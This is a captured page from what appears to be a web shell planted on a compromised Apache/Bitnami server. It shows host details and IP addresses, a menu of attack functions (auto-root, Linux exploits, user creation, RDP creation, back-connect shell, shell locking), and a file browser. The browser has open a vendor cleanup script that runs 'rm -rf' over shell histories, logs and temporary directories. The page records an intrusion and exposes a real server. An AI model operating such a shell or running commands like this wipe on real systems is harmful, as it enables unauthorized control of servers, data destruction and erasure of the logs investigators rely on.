Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
bitnami /
nami /
lib /
recipes /
[ HOME SHELL ]
Name
Size
Permission
Action
apps
[ DIR ]
drwxr-xr-x
add_to_system_path.js
881
B
-rw-r--r--
aws_cfn_signal.js
2.22
KB
-rw-r--r--
bitnami_agent.js
4.65
KB
-rw-r--r--
bitnami_enable_login.js
1002
B
-rw-r--r--
clean_machine.js
804
B
-rw-r--r--
configure_host.js
4.08
KB
-rw-r--r--
data_disk.js
4.02
KB
-rw-r--r--
download_database_ssl_certific...
1.42
KB
-rw-r--r--
environment_script.js
2.69
KB
-rw-r--r--
gonit.js
2.91
KB
-rw-r--r--
platform.js
765
B
-rw-r--r--
port_mapping.js
708
B
-rw-r--r--
remove_passwords.js
641
B
-rw-r--r--
resize.js
733
B
-rw-r--r--
setup_scripts.js
1.39
KB
-rw-r--r--
ssh_settings.js
3.11
KB
-rw-r--r--
swapfile.js
1.76
KB
-rw-r--r--
system_packages.js
1.71
KB
-rw-r--r--
system_services.js
2.02
KB
-rw-r--r--
system_user.js
773
B
-rw-r--r--
wait_for_dns.js
933
B
-rw-r--r--
welcome_message.js
3.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : clean_machine.js
/* * Copyright VMware, Inc. * SPDX-License-Identifier: GPL-2.0-only */ /// <reference path="../../typings-recipe.d.ts" /> /* * Clean machine */ "use strict"; recipes.register({ id: "clean-machine", on: { cleanMachine: {} }, conditions: { platformTags: { any: ["linux"] } }, recipeHandler: async function (input) { let script = "rm -rf " + "/root/.*_history /home/*/.*_history /home/*/.sudo* " + "/opt/bitnami/*/logs/* /opt/bitnami/.tmp/* " + "/var/lib/cloud/* /media/* /tmp/* /mnt/* /etc/sysconfig/rh-cloud-firstboot " + "`find / -name \"*.log\" -o -name \"mysql.sock\" -o -name \".s.PGSQL*\"`\n"; fs.writeFileSync("/tmp/clean_machine", script); runProgram("sh", ["/tmp/clean_machine"]); } });
Close